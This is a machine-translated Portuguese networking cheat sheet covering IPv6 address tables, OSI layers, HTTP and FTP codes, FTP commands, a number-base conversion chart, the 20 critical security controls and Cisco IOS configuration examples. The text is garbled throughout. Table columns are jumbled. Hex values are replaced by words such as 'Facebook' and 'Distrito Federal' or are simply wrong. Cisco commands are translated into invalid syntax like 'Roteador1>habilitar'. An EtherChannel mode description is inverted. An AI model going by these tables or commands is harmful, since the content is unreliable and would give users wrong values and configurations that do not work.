IPv4-IPv4 mapeado IPv6
!000 Prefixo de roteamento global (n) ID de sub-rede (64-1) ID da interface (64) 6 para 4 2002::/16
Endereços IPv6 Global Unicast (prefixo 2000::/3, delegado pela IANA)
Endereços multicast bem conhecidos
001 Prefixo de roteamento global (45) ID da sub-rede (16) ID da interface (64)
FF01:0:0:0:0:0:0:1 Todos os endereços dos nós Interface-local
Endereço IPv6 compatível com IPv4
FF02:0:0:0:0:0:0:1 Todos os endereços dos nós Link-local
0 (80 bits) 0 (16 bits) Endereço IPv4 (32 bits)
FF01:0:0:0:0:0:0:2 Todos os endereços de roteadores Interface-local
Endereço IPv6 mapeado em IPv4
FF02:0:0:0:0:0:0:2 Todos os endereços de roteadores Link-local
0 (80 bits) FFFF (16 bits) Endereço IPv4 (32 bits)
FF05:0:0:0:0:0:0:2 Todos os endereços de roteadores Site local
Endereço Unicast IPv6 Link-Local (FE80::/10)
FF02:0:0:0:0:1:FFXX:XXXX Endereço do nó solicitado Link-local
1111111010 (10 bits) 0 (54 bits) ID da interface (64 bits)
FF02:0:0:0:0:0:0:4 Roteadores DVMRP Link-local
Endereço Unicast IPv6 Local do Site (FEC0::/10)
FF02:0:0:0:0:0:0:5 OSPFIGP Link-local
1111111011 (10 bits) ID de sub-rede (54) ID da interface (64 bits)
FF02:0:0:0:0:0:0:6 DRs OSPFIGP Link-local
Endereço Anycast do Roteador de Sub-Rede
FF02:0:0:0:0:0:0:9 Roteadores RIP Link-local
Prefixo de sub-rede (n bits) 0 (128-n)
FF02:0:0:0:0:0:0:D Todos os roteadores PIM Link-local
Tipos de Ethernet Tipos de opções IPv6 (8 bits, 3 campos)
FF02:0:0:0:0:0:0:16 Todos os roteadores MLDv2 Link-local
ato - 2 bits
0800 IPv4 00 opção de pular FF02:0:0:0:0:0:1:2 Todos os agentes DHCP Link-local
0806 ARP 01 descarte FF05:0:0:0:0:0:1:3 Todos os servidores DHCP Site local
8035 ARP reverso silenciosamente 10 descarte e envie ICMP
86DD IPv6 FF0X:0:0:0:0:0:0:101 Protocolo de tempo de rede Escopo Variável
11 descarte e envie ICMP, se unicast
8847 MPLS Unicast chg - 1 bit
Endereço multicast Escopo
8848 Multidifusão MPLS 0 = os dados da opção não mudam durante o trajeto
1 Interface-local
8863 PPoE (estágio de descoberta) 1 = os dados da opção podem mudar durante o trajeto FF Bandeiras Âmbito ID do grupo
2 Link-local
8864 PPoE (estágio de sessão PPP) resto - 5 bits, o resto do Tipo de Opção (8 bits) (4) (4) (112)
4 Admin-local
Campos de cabeçalho IPv6 Next Bandeiras (000T) 5 Site-local
Mensagens informativas ICMPv6
T = 0 Bem conhecido 8 Organização-local
041 IPv6 T = 1 Transiente E Global
128 Solicitação de eco
000 Opção IPv6 Hop-by-Hop
129 Resposta de eco
060 Opções de destino para IPv6 Mensagens de erro ICMPv6 (tipo/código)
130 Consulta de ouvinte multicast
043 Cabeçalho de roteamento para IPv6
131 Relatório de ouvinte multicast 1 Destino Inalcançável
044 Cabeçalho de fragmento para IPv6
132 Ouvinte Multicast Concluído
051 Cabeçalho de autenticação (AH) 0 - nenhuma rota para o destino
133 Solicitação de roteador
050 Carga de Segurança Encap (ESP) 1 - comunicação com o destino
134 Anúncio do roteador
059 Nenhum próximo cabeçalho para IPv6 administrativamente proibido
135 Solicitação de Vizinhos
2 - (não atribuído)
136 Anúncio de vizinho 3 - endereço inacessível
002 Gerenciamento de Grupos de Internet (IGMP)
137 Mensagem de redirecionamento
006 Controle de Transmissão (TCP) 4 - porta inacessível
138 Renumeração de roteadores
017 Datagrama do usuário (UDP) 2 Pacotes Muito Grandes
139 Consulta de informações do nó ICMP 3 Tempo Excedido 0 -
046 Protocolo de Reserva (RSVP)
140 Resposta de informações do nó ICMP
047 Encapsulamento de Roteamento Geral (GRE) limite de salto excedido em trânsito
Relatório de ouvinte multicast versão 2 143
055 Mobilidade IP (MÓVEL) 1 - tempo de remontagem do fragmento excedido
144 Solicitação de descoberta de endereço do agente doméstico Problema de 4 parâmetros 0 -
058 ICMP para IPv6 (ICMPv6)
145 Resposta de descoberta de endereço do agente doméstico campo de cabeçalho incorreto 1
089 OSPFIGP
146 Solicitação de prefixo móvel
094 Protocolo de encapsulamento IP dentro de IP (IPIP) - tipo de cabeçalho seguinte não reconhecido
147 Anúncio de prefixo móvel www.est
103 Multicast independente de protocolo (PIM) 2 - opção IPv6 não reconhecida
128 - 255 Mensagens informativas
135 Cabeçalho de Mobilidade 0-127 Mensagens de erro

88
Machine Translated by Google

9
Machine Translated by Google

TCP/IP
Camada Protocolos OSI Responsabilidades Escopo
Modelo

# Nome

NNTP, SIP, SSI, DNS, FTP,

Gopher, HTTP, NFS, NTP,
DHCP, SMPP, SMTP,
FTAM, X.400, SNMP, Telnet, RIP, BGP,
X.500, DAP, ROSA, BOOTP, TFTP, POP3, Aplicações do usuário
7 Aplicação RTSE, ACSE IMAP, Serviços Dados do usuário Dados do aplicativo

Aplicativo
ISO/IEC 8823,
X.226, ISO/IEC 9576- MIME, SSL, TLS, XDR, 1,
6 Apresentação X.236 Shells e Redirecionadores

Soquetes. Sessão

ISO/IEC 8327, estabelecimento em TCP, SIP, X.225, ISO/ Estabelecimento de Sessão, Sessões entre
IEC 9548- RTP, NetBIOS, RPC, 1, Gestão e local ou remoto
5ª Sessão X.235 Pipes nomeados Rescisão Sessões dispositivos

Endereçamento em nível de processo;

Multiplexação/Desmultiplexação
ing; Conexões;
Transporte
Segmentação e
(TCP)
ISO/IEC 8073, TP0, Remontagem;
TP1, TP2, TP3, TP4 Agradecimentos e
(X.224), Retransmissões; Fluxo Datagramas/
4 Transporte ISO/IEC 8602, X.234 TCP, UDP, SCTP Controlar Segmentos

IP, IPsec, ICMP, IGMP,

OSPF, IPv6; IP NAT; IPsec; ISO/
IEC 8208, X.25 IP móvel; ICMP; IPX; (PLP), ISO/IEC Internet

8878, DLC; PLP; Roteamento X.223, ISO/IEC (PI)

8473- protocolos como RIP e 1, CLNP

3 Rede X.233. BGP

ISO/IEC 7666, X.25 Dados de baixo nível

(LAPB), Barramento de mensagens

Token, X.222, ISO/IEC 8802- entre locais
2 Link de dados 2 LLC Tipo 1 e 2 PPP, SLIP, PPTP, L2TP dispositivos
Rede
Codificação e Sinalização;
X.25 (X.21bis, Dados Físicos Sinais elétricos ou
EIA/TIA-232, Transmissão; Hardware luminosos
EIA/TIA-449, Especificações; Topologia e enviados entre locais

1 Físico EIA-530, G.703) Design Pedaços dispositivos

10 9
Machine Translated by Google

Códigos de status HTTP/1.1

Nome do código Notas
100 Continuar

101 Protocolos de comutação

200 OK Tudo está normal

201 Criado

202 Aceito

203 Informações não autorizadas

sucedido

204 Nenhum conteúdo

Bem-

205 Redefinir conteúdo

206 Conteúdo Parcial

300 Múltiplas Escolhas

301 Movido Permanentemente Atualize seu URL, ele foi movido para sempre.

302 encontrados
Redirecionamento

303 Ver outros

304 Não modificado

305 Usar proxy

306 Não utilizado

307 Redirecionamento temporário Este arquivo foi movido temporariamente. Não atualize seus favoritos.

400 Solicitação Ruim O servidor não entendeu a URL que você forneceu.

401 Não autorizado Deve ser autenticado

402 Pagamento necessário Não é realmente usado

403 Proibido O servidor se recusa a fornecer um arquivo, a autenticação não ajudará

404 Não Encontrado Não existe um arquivo nesse endereço

Método 405 não permitido

406 Não aceitável

407 Autenticação de proxy necessária

408 Tempo limite de solicitação O navegador demorou muito para solicitar algo
cliente

409 Conflito
Erro
do

410 desaparecido

411 Comprimento necessário

412 Pré-condição falhou

413 Solicitação de entidade muito grande

415 Tipo de mídia não suportado

416 Intervalo de solicitação não satisfatório

417 Expectativa falhou

Erro interno do servidor 500 Algo não funcionou corretamente no servidor.

501 Não implementado

502 Bad Gateway

503 Serviço indisponível Muito ocupado para responder a um cliente

servidor
Erro

504 Tempo limite do gateway

do

505 Versão HTTP não suportada

Creative Commons Atribuição-Compartilhamento pela mesma Licença 3.0 Não Adaptado – Bryan English - http://bluelinecity.com

11
Machine Translated by Google

FTP

Código Explicação
Série 100 A ação solicitada está sendo iniciada, aguarde outra resposta antes de prosseguir com um novo comando. 110 Reiniciar repetição do
marcador. Neste caso, o texto é exato e não deixado para a implementação específica; ele deve ser lido: MARK yyyy = mmmm onde yyyy é o
marcador de fluxo de dados do processo do usuário e mmmm o marcador equivalente do servidor (observe os espaços entre os marcadores e "="). 120 125 150
Serviço pronto em nnn minutos.
Conexão de dados já aberta; transferência iniciando.
Status do arquivo ok; prestes a abrir a conexão de dados.
Série 200 A ação solicitada foi concluída com sucesso.
Comando não implementado, supérfluo neste site. 202 Status do
211
sistema ou resposta de ajuda do sistema.
212 Status do diretório.
213 Status do arquivo.

214 Mensagem de ajuda. Sobre como usar o servidor ou o significado de um comando não padrão específico. Esta resposta é útil apenas para o
usuários humanos.
215 Tipo de sistema NAME. Onde NAME é um nome de sistema oficial do registro mantido pela IANA.
220 Serviço pronto para novo usuário.
221 Conexão de controle de fechamento de serviço.
225 Conexão de dados aberta; nenhuma transferência em andamento.
226 Fechando conexão de dados. Ação de arquivo solicitada bem-sucedida (por exemplo, transferência de arquivo ou aborto de arquivo).
227 Entrando no Modo Passivo (h1,h2,h3,h4,p1,p2).
228 Entrando no Modo Passivo Longo (endereço longo, porta).
229 Entrando no Modo Passivo Estendido (|||porta|).
230 Usuário logado, prossiga. Desconectado se apropriado.
231 Usuário desconectado; serviço encerrado.
232 Comando de logout observado, será concluído quando a transferência for concluída.
234 Especifica que o servidor aceita o mecanismo de autenticação especificado pelo cliente e a troca de dados de segurança é
concluído. Um código não padrão de nível superior criado pela Microsoft. 250 Ação de
arquivo solicitada ok, concluída.
257 "PATHNAME" criado.

300 Series O comando foi aceito, mas a ação solicitada está em espera, aguardando o recebimento de mais informações. 331 332 350
Nome de usuário ok, precisa de senha.
É necessária uma conta para fazer login.

Ação de arquivo solicitada aguardando mais informações Série 400

O comando não foi aceito e a ação solicitada não ocorreu, mas a condição de erro é temporária e a ação pode ser solicitada novamente. 421 Serviço não disponível, fechando conexão de
controle. Isso pode ser uma
resposta a qualquer comando se o serviço souber que deve ser desligado. 425 Não é possível abrir a conexão de dados.

426 Conexão fechada; transferência abortada.

430 Nome de usuário ou senha inválidos.
434 Host solicitado indisponível.
450 Ação de arquivo solicitada não tomada.
451 Ação solicitada abortada. Erro local no processamento.
Ação solicitada não tomada. Espaço de armazenamento insuficiente no sistema. Arquivo indisponível (por exemplo, arquivo
ocupado). 452 Erro de sintaxe da série 500, comando não reconhecido e a ação solicitada não ocorreu. Isso pode incluir erros como linha de comando muito longa. 501

Erro de sintaxe em parâmetros ou argumentos.

502 Comando não implementado.
503 Sequência incorreta de comandos.
504 Comando não implementado para esse parâmetro.
530 Não conectado.
532 Precisa de uma conta para armazenar arquivos.
550 Ação solicitada não tomada. Arquivo indisponível (por exemplo, arquivo não encontrado, sem acesso).
551 Ação solicitada abortada. Tipo de página desconhecido.
552 Ação de arquivo solicitada abortada. Alocação de armazenamento excedida (para diretório ou conjunto de dados atual).
553 Ação solicitada não tomada. Nome de arquivo não permitido.
Respostas da série 600 sobre confidencialidade e integridade 631 632 633
Resposta com integridade protegida.
Resposta protegida por confidencialidade e integridade.
Resposta protegida por confidencialidade.
Série 10000 Códigos de erro comuns do Winsock

10054 Conexão redefinida pelo peer. A conexão foi fechada à força pelo host remoto.
10060 Não é possível conectar ao servidor remoto. 10061
Não é possível conectar ao servidor remoto. A conexão é recusada ativamente pelo servidor.

12
Machine Translated by Google

Lista de comandos FTP brutos

(Aviso: este é um documento técnico, não necessário para a maioria dos usos de FTP.)

Observe que os comandos marcados com um *

não são implementados em vários servidores FTP.

Comandos comuns
• ABOR - abortar uma transferência de
arquivo • CWD - alterar diretório de trabalho • DELE
- excluir um arquivo remoto
• LIST - lista arquivos remotos
• MDTM - retorna o tempo de modificação de um arquivo • MKD -
cria um diretório remoto • NLST - lista de nomes
do diretório remoto • PASS - envia senha • PASV - entra
no modo passivo • PORT - abre uma
porta de dados

• PWD - imprimir diretório de trabalho • QUIT -

encerrar a conexão • RETR - recuperar um arquivo
remoto • RMD - remover um diretório remoto •
RNFR - renomear de

• RNTO - renomear para

• SITE - comandos específicos do site • SIZE -
retorna o tamanho de um arquivo • STOR -
armazena um arquivo no host remoto • TYPE - define o tipo
de transferência
• USUÁRIO - enviar nome de usuário

Comandos menos comuns

• ACCT* - envia informações da conta • APPE - anexa
a um arquivo remoto • CDUP - CWD para o pai
do diretório atual • HELP - retorna ajuda sobre como usar o servidor • MODE
- define o modo de transferência

• NOOP - não fazer nada •

REIN* - reinicializar a conexão • STAT - retornar o
status do servidor
• STOU - armazena um arquivo exclusivamente
• STRU - define a estrutura de transferência de arquivo

• SYST - tipo de sistema de retorno

13
Machine Translated by Google
Tabela de conversão decimal-binário-hexadecimal
Este gráfico mostra todas as combinações de decimal, binário e hexadecimal de 0 a 25 5 decimal. Ao fazer uma alteração em um CV, este gráfico mostrará a conversão para diferentes
sistemas de numeração. Alguns decodificadores dividem o CV em duas partes. Quando você modifica um CV, precisa escrever de volta todos os 8 bits. E ste gráfico ajudará a determinar o valor de bit correto de um CV.
Decimal Binário Hex Decimal Binário Hexadecimal Decimal Binário Hex Decimal Binário Hex
Bit No.> 76543210 76543210 76543210 76543210
0 00000000 1 0 64 01000000 40 65 01000001 128 10000000 80 129 10000001 192 11000000 C0
00000001 2 00000010 1 41 66 01000010 42 67 01000011 81 130 10000010 82 131 193 11000001 C1
3 00000011 4 2 43 68 01000100 44 10000011 83 132 10000100 84 194 11000010 C2
00000100 3 195 11000011 C3
4 196 11000100 C4
5 00000101 5 69 01000101 45 133 10000101 85 197 11000101 C5
6 00000110 6 70 01000110 46 134 10000110 86 198 11000110 C6
7 00000111 7 71 01000111 47 135 10000111 87 199 11000111 C7
8 00001000 9 8 72 01001000 48 73 01001001 136 10001000 88 137 10001001 200 11001000 C8
00001001 10 9 49 89 201 11001001 C9
00001010 11 00001011 UM 74 01001010 4A 138 10001010 8A 202 11001010 CA
12 00001100 B 75 01001011 4B 139 10001011 8B 203 11001011 CB
C 76 01001100 4C 140 10001100 8C 204 11001100 CC
13 00001101 E 77 01001101 4D 141 10001101 8D 205 11001101 CD
14 00001110 E 78 01001110 4E 142 10001110 8E 206 11001110 CE
15 00001111 F 79 01001111 4F 143 10001111 8F 207 11001111 CF
16 00010000 10 80 01010000 50 144 10010000 90 208 11010000 D0
17 00010001 11 18 00010010 81 01010001 51 82 01010010 145 10010001 91 146 10010010 209 11010001 D1
12 19 00010011 13 20 00010100 52 83 01010011 53 84 01010100 92 147 10010011 93 148 210 11010010 D2
14 21 00010101 15 54 85 01010101 55 10010100 94 149 10010101 95 211 11010011 D3
212 11010100 D4
213 11010101 D5
22 00010110 16 86 01010110 56 150 10010110 96 214 11010110 D6
23 00010111 17 87 01010111 57 151 10010111 97 215 11010111 D7
24 00011000 18 88 01011000 58 152 10011000 98 216 11011000 D8
25 00011001 19 89 01011001 59 153 10011001 99 217 11011001 D9
26 00011010 1A 90 01011010 5A 154 10011010 9A 218 11011010 DA
27 00011011 1B 91 01011011 5B 155 10011011 9B 219 11011011 BD
28 00011100 1C 92 01011100 5C 156 10011100 9C 220 11011100 CC
29 00011101 1D 93 01011101 5D 157 10011101 9D 221 11011101 DD
30 00011110 1E 94 01011110 5E 158 10011110 9E 222 11011110 DE
31 00011111 1F 95 01011111 5F 159 10011111 9F 223 11011111 DF
32 00100000 20 96 01100000 60 160 10100000 A0 224 11100000 E0
33 00100001 21 34 00100010 97 01100001 61 98 01100010 161 10100001 A1 225 11100001 E1
22 35 00100011 23 36 00100100 62 99 01100011 63 100 162 10100010 A2 226 11100010 E2
24 37 00100101 25 01100100 64 101 01100101 65 163 10100011 A3 227 11100011 E3
164 10100100 A4 228 11100100 E4
165 10100101 A5 229 11100101 E5
38 00100110 26 102 01100110 66 166 10100110 A6 230 11100110 E6
39 00100111 27 103 01100111 67 167 10100111 A7 231 11100111 E7
40 00101000 28 104 01101000 68 168 10101000 A8 232 11101000 E8
41 00101001 29 105 01101001 69 169 10101001 A9 233 11101001 E9
42 00101010 2A 106 01101010 6A 170 10101010 AA 234 11101010 EA
43 00101011 2B 107 01101011 6B 171 10101011 AB 235 11101011 EB
44 00101100 2C 108 01101100 6C 172 10101100 CA 236 11101100 CE
45 00101101 2D 109 01101101 6D 173 10101101 DC 237 11101101 DE
46 00101110 2E 110 01101110 6E 174 10101110 AE 238 11101110 EE
47 00101111 2F 111 01101111 6F 175 10101111 AF 239 11101111 EF
48 00110000 30 112 01110000 70 176 10110000 B0 240 11110000 F0
49 00110001 31 113 01110001 71 177 10110001 B1 241 11110001 F1
50 00110010 32 51 00110011 114 01110010 72 115 01110011 178 10110010 B2 242 11110010 F2
33 52 00110100 34 53 00110101 73 116 01110100 74 117 179 10110011 B3 243 11110011 F3
35 54 00110110 36 01110101 75 118 01110110 76 180 10110100 B4 244 11110100 F4
181 10110101 B5 245 11110101 F5
182 10110110 B6 246 11110110 F6
55 00110111 37 119 01110111 77 183 10110111 B7 247 11110111 F7
56 00111000 38 120 01111000 78 184 10111000 B8 248 11111000 F8
57 00111001 39 121 01111001 79 185 10111001 B9 249 11111001 F9
58 00111010 3A 122 01111010 7A 186 10111010 BA 250 11111010 FA
59 00111011 3B 123 01111011 7B 187 10111011 BB 251 11111011 Facebook
60 00111100 3C 124 01111100 7C 188 10111100 a.C. 252 11111100 FC
61 00111101 3D 125 01111101 7D 189 10111101 BD 253 11111101 Distrito Federal
62 00111110 3E 126 01111110 7E 190 10111110 SER 254 11111110 FE
63 00111111 3F 127 01111111 7F 191 10111111 AM 255 11111111 FF

Controle de farol CV-22 Advance Consist Bit 1 = Passo de velocidade 28

Taxa de aceleração do CV-23 Advance Consiste Bit 2 = habilitação dc
Sistema de numeração binário para um byte
Taxa de desaceleração do Advance Consiste CV-24 Bit 3 = Reconhecimento antecipado
Número de bits| 7| 6| 5| 4|3|2|1|0|
Bit 4 = Tabela de velocidade alternativa
Peso do bit|128|64|32|16|8|4|2|1|
CONSULTE O MANUAL DO DECODIFICADOR PARA Bit 5 = Endereço longo.
CV-66 Trim dianteiro
Alguns CVs comumente usados TODOS OS CVs QUE ELE USA E OS
CV-1 Endereço Curto Tensão de ponto médio CV-6 Tabela de velocidade CV-67 a 94
FAIXA DE VALORES.
Tensão de partida CV-2 Número da versão CV-7 CV-95 Trim reverso
CV-3 Taxa de aceleração CV-8 ID do fabricante
DEF 24Abril02
Taxa de desaceleração CV-4CV-17/18 Endereço Longo
CV-5 Tensão Máxima CV-19 Consiste Endereço Registro de configuração CV-29
Bit 0=Direção de viagem
Controle de função CV-21 Advance Consiste

14
10
Machine Translated by Google

Os 20 controles críticos

1 - Inventário de dispositivos autorizados e não autorizados

Gerencie ativamente (faça o inventário, rastreie e corrija) todos os dispositivos de hardware na rede para que somente dispositivos autorizados tenham acesso, e dispositivos não

autorizados e não gerenciados sejam encontrados e impedidos de obter acesso.

2 - Inventário de Software Autorizado e Não Autorizado

Gerencie ativamente (faça o inventário, rastreie e corrija) todos os softwares na rede para que somente softwares autorizados sejam
instalados e possam ser executados, e que softwares não autorizados e não gerenciados sejam encontrados e impedidos de serem
instalados ou executados.

3 - Configurações seguras para hardware e software em dispositivos móveis, laptops, estações de trabalho e
Servidores

Estabelecer, implementar e gerenciar ativamente (rastrear, relatar, corrigir) a configuração de segurança de laptops, servidores e estações de
trabalho usando um rigoroso processo de gerenciamento de configuração e controle de alterações para impedir que invasores explorem serviços e
configurações vulneráveis.

4 - Avaliação e remediação contínua de vulnerabilidades

Adquirir, avaliar e tomar medidas continuamente sobre novas informações para identificar vulnerabilidades, remediar,
e minimizar a janela de oportunidade para os invasores.

5 - Defesas contra malware

Controle a instalação, a disseminação e a execução de códigos maliciosos em vários pontos da empresa, ao mesmo tempo em que otimiza o
uso da automação para permitir a atualização rápida da defesa, coleta de dados e ações corretivas.

6 - Segurança de Software de Aplicação

Gerenciar o ciclo de vida de segurança de todos os softwares desenvolvidos e adquiridos internamente para prevenir, detectar e corrigir fraquezas
de segurança.

7 - Controle de acesso sem fio

Os processos e ferramentas usados para rastrear/controlar/prevenir/corrigir o uso de segurança de redes locais sem fio (LANS), pontos de acesso e
sistemas de clientes sem fio.

8 - Capacidade de recuperação de dados

Os processos e ferramentas usados para fazer backup adequado de informações críticas com uma metodologia comprovada para recuperação
oportuna delas.

9 - Avaliação de habilidades de segurança e treinamento apropriado para preencher lacunas

Para todas as funções funcionais na organização (priorizando aquelas críticas à missão do negócio e sua segurança), identifique o conhecimento,
as habilidades e as competências específicas necessárias para dar suporte à defesa da empresa; desenvolva e execute um plano integrado para
avaliar, identificar lacunas e remediar por meio de políticas, planejamento organizacional, treinamento e programas de conscientização.

10 - Configurações seguras para dispositivos de rede como firewalls, roteadores e switches

Estabelecer, implementar e gerenciar ativamente (rastrear, relatar, corrigir) a configuração de segurança de dispositivos de infraestrutura de
rede usando um rigoroso processo de gerenciamento de configuração e controle de alterações para evitar que invasores explorem serviços e
configurações vulneráveis.

15
Machine Translated by Google

11 - Limitação e Controle de Portas, Protocolos e Serviços de Rede

Gerencie (rastreie/controle/corrija) o uso operacional contínuo de portas, protocolos e serviços em dispositivos em rede para
minimizar as janelas de vulnerabilidade disponíveis para invasores.

12 - Uso controlado de privilégios administrativos

Os processos e ferramentas usados para rastrear/controlar/prevenir/corrigir o uso, atribuição e configuração de privilégios

administrativos em computadores, redes e aplicativos.

13 - Defesa de Fronteiras

Detectar/prevenir/corrigir o fluxo de informações transferindo redes de diferentes níveis de confiança, com foco em dados que
causam danos à segurança.

14 - Manutenção, Monitoramento e Análise de Logs de Auditoria

Colete, gerencie e analise registros de auditoria de eventos que podem ajudar a detectar, entender ou se recuperar de um ataque.

15 - Controle de acesso com base na necessidade de saber

Os processos e ferramentas usados para rastrear/controlar/prevenir/corrigir o acesso seguro a ativos críticos (por exemplo,
informações, recursos e sistemas) de acordo com a determinação formal de quais pessoas, computadores e aplicativos têm necessidade
e direito de acessar esses ativos críticos com base em uma classificação aprovada.

16 - Monitoramento e Controle de Contas

Gerencie ativamente o ciclo de vida das contas de sistemas e aplicativos — sua criação, uso, inatividade, exclusão — para minimizar as
oportunidades de invasores aproveitá-las.

17 - Proteção de Dados

Os processos e ferramentas usados para evitar a exfiltração de dados, mitigar os efeitos dos dados exfiltrados e garantir a privacidade
e a integridade de informações confidenciais.

18 - Resposta e Gestão de Incidentes

Proteja as informações da organização, bem como sua reputação, desenvolvendo e implementando uma infraestrutura de resposta a
incidentes (por exemplo, planos, funções definidas, treinamento, comunicações, supervisão de gerenciamento) para descobrir
rapidamente um ataque e, então, conter efetivamente os danos, erradicar a presença do invasor e restaurar a integridade da rede e dos
sistemas.

19 - Engenharia de Rede Segura

Faça da segurança um atributo inerente da empresa especificando, projetando e integrando recursos que permitam operações de
sistemas de alta confiança, ao mesmo tempo em que negam ou minimizam oportunidades para invasores.

20 - Testes de Penetração e Exercícios de Red Team

Teste a força geral das defesas de uma organização (a tecnologia, os processos e as pessoas) simulando os objetivos e as ações
de um invasor.

16
Machine Translated by Google

Cisco Networking tudo em um

Para criar e configurar uma rede Cisco, você precisa saber sobre roteadores e switches para desenvolver e gerenciar sistemas Cisco seguros. Familiarize-se com dispositivos de rede
Cisco e listagens de códigos; e descubra como gerenciar roteamento estático e visualizar informações de roteamento.

Modelo OSI para redes Cisco

Embora você possa não usar o modelo OSI todos os dias, você deve estar familiarizado com ele, especificamente ao trabalhar com switches e roteadores Cisco (que operam na Camada 2 e
Camada 3, respectivamente). Aqui estão alguns dos itens que operam em cada nível do modelo OSI:

Camada Descrição Exemplos

7. Aplicação Responsável por iniciar ou atender a solicitação. SMTP, DNS, HTTP e Telnet

6. Formata as informações para que sejam compreendidas pelo sistema receptor. Compressão e criptografia dependendo da
Apresentação implementação

5. Sessão Responsável por estabelecer, gerenciar e encerrar a sessão. NetBIOS

4. Transporte Divide as informações em segmentos e é responsável pela conexão e pela comunicação sem conexão. TCP e UDP

3. Rede Responsável pelo endereçamento lógico e roteamento IP, ICMP, ARP, RIP, IGRP e roteadores

2. Link de dados Responsável pelo endereçamento físico, correção de erros e preparação das informações para o Endereço MAC, CSMA/CD, switches e pontes
mídia

1. Físico Lida com o sinal elétrico. Cabos, conectores, hubs e repetidores

Como configurar uma rede Cisco

Como todas as redes, uma rede Cisco precisa ser configurada corretamente. Para fazer isso, você precisa saber os modos de configuração a serem usados ao configurar sua rede. Você
também deve saber como configurar uma interface, configurar uma interface de gerenciamento de switch e configurar uma interface para usar DHCP para sua rede Cisco.

Modos de configuração para redes Cisco

Ao se movimentar no Cisco IOS, você verá muitos prompts. Esses prompts mudam conforme você se move de um modo de configuração para outro. Aqui está um resumo dos principais modos de configuração:

• Modo EXEC do usuário: Quando você se conecta a um dispositivo Cisco, o modo de configuração padrão é o modo exec do usuário. Com o modo exec do usuário, você pode visualizar as configurações no dispositivo
mas não faça nenhuma alteração. Você sabe que está no modo User EXEC porque o prompt do IOS exibe um ">".

• Modo EXEC privilegiado: para fazer alterações no dispositivo, você deve navegar para o modo EXEC privilegiado, onde pode ser necessário inserir uma senha. Modo EXEC privilegiado
O modo EXEC é exibido com um "#" no prompt.

• Modo de configuração global: o modo de configuração global é onde você vai para fazer alterações globais no roteador, como o nome do host. Para navegar para a configuração global
modo EXEC Privilegiado, você digita "configure terminal" ou "conf t" onde você será colocado no prompt "(config)#".

• Subprompts: Há vários subprompts diferentes do modo de configuração global nos quais você pode navegar, como os prompts de interface para modificar as configurações em uma interface específica ou os prompts de
linha para modificar as diferentes portas no dispositivo.

Configurar uma interface para rede Cisco

Ao trabalhar com roteadores em particular, mas também ao lidar com a interface de gerenciamento em switches, muitas vezes você precisará configurar interfaces de rede que corresponderão a portas de interface física
ou interfaces virtuais na forma de uma interface LAN virtual (VLAN) (ao lidar com switches).

Para suas interfaces de roteador, o exemplo a seguir definirá informações de configuração de velocidade, duplex e IP para a interface FastEthernet 0/0 (observe a referência de interface como slot/porta). No caso do
roteador, a interface é habilitada usando o comando no shutdown na etapa final; interfaces em switches são habilitadas por padrão.
Roteador1>habilitar
Roteador1#configurar terminal
Roteador1(config)#interface FastEthernet0/0
Router1(config-if)#description LAN privada
Roteador1(config-if)#velocidade 100
Roteador1(config-if)#duplex completo
Roteador1(config-if)# endereço ip 192.168.1.1 255.255.255.0
Roteador1(config-if)#sem desligamento
Configurar uma interface de gerenciamento de switch para rede Cisco
Para seus switches, para habilitar um endereço IP em sua interface de gerenciamento, você usará algo similar a este exemplo. Neste exemplo, o gerenciamento está sendo executado sobre a VLAN 1 - a VLAN padrão.

Switch1>ativar
Switch1#configurar terminal
Switch1#interface VLAN 1
Switch1(config-if)# endereço ip 192.168.1.241 255.255.255.0
Configurar uma interface para usar DHCP para rede Cisco
Se você quiser configurar um roteador ou switch para recuperar suas informações de configuração de IP de um servidor DHCP (Dynamic Host Configuration Protocol) de rede, você pode usar comandos como o exemplo a
seguir.
Roteador1>habilitar
Roteador1#configurar terminal
Roteador1(config)#interface FastEthernet0/0
Roteador1(config-if)#ip dhcp
Criando uma VLAN para rede Cisco
Ao trabalhar com sua rede Cisco, você pode querer separar usuários em diferentes domínios de transmissão para segurança ou redução de tráfego. Você pode fazer isso implementando VLANs. O exemplo a seguir
criará VLAN (VLAN2) e colocará as portas em um switch (de 1 a 12) na VLAN2.
Switch1>ativar
Switch1#configurar terminal
Switch1(config)#interface vlan 2
Switch1(config-if)#description VLAN financeira
Switch1(config-if)#sair
Switch1(config)#intervalo de interface FastEthernet 0/1 , Ethernet rápida 0/12
Acesso ao modo Switch1(config-if-range)#switchport
Switch1(config-if-range)#switchport acesso vlan 2

17
11
Machine Translated by Google

Se você estiver conectando dois switches juntos, então você vai querer permitir que todas as VLANs configuradas passem entre os dois switches. Isso é feito implementando uma porta trunk. Para configurar a porta 24 no seu
switch para ser uma porta trunk, você usará o seguinte código:
Switch1>ativar
Switch1#configurar terminal
Switch1(config)#interface FastEthernet 0/24
Switch1(config-if-range)#modo switchport trunk
Usando EtherChannel para redes Cisco
Não tenha medo de usar EtherChannel na sua rede Cisco. O EtherChannel permite que você pegue até oito portas de rede no seu switch e as trate como um único link maior.
Isso pode ser usado para conectar servidores com várias placas de rede que são vinculadas (ou agrupadas) a um switch, ou para conectar vários switches juntos. Existem dois protocolos principais de negociação,
Port Aggregation Protocol (PAgP), que é um protocolo proprietário da Cisco, e Link Aggregation Control Protocol (LACP), que é um protocolo de padrões abertos.

Para definir o EtherChannel para uso com um dos protocolos, você o configurará para oferecer suporte a um dos seguintes modos.

• auto: define a interface para responder aos pacotes de negociação PAgP, mas a interface iniciará as negociações por conta própria.

• desejável: define a interface para tentar negociar ativamente uma conexão PAgP.

• on: Força a conexão a trazer todos os links para cima sem usar um protocolo para negociar conexões. Este modo só pode se conectar a outro dispositivo que também esteja definido como on. Ao usar este modo, o switch não
negocia o link usando PAgP ou LACP.

• ativo: define a interface para tentar negociar ativamente conexões com outros dispositivos LACP.

• passivo: define a interface para responder aos dados LACP se receber solicitações de negociação de outros sistemas.

O exemplo a seguir configurará o EtherChannel para usar as portas de grupo 11 e 12 no switch juntas usando PAgP como protocolo. O mesmo tipo de comando seria usado no switch ao qual o Switch1 está conectado.

Switch1> habilitar
Switch1# configurar terminal
Switch1(config)# intervalo de interface FastEthernet0/11 -12
Switch1(config-if-range)# acesso ao modo switchport
Switch1(config-if-range)# switchport acesso vlan 10
Switch1(config-if-range)# grupo-de-canais 5 modo desejável

Trabalhando com o Spanning Tree Protocol para redes Cisco O Spanning Tree Protocol (STP) permite que

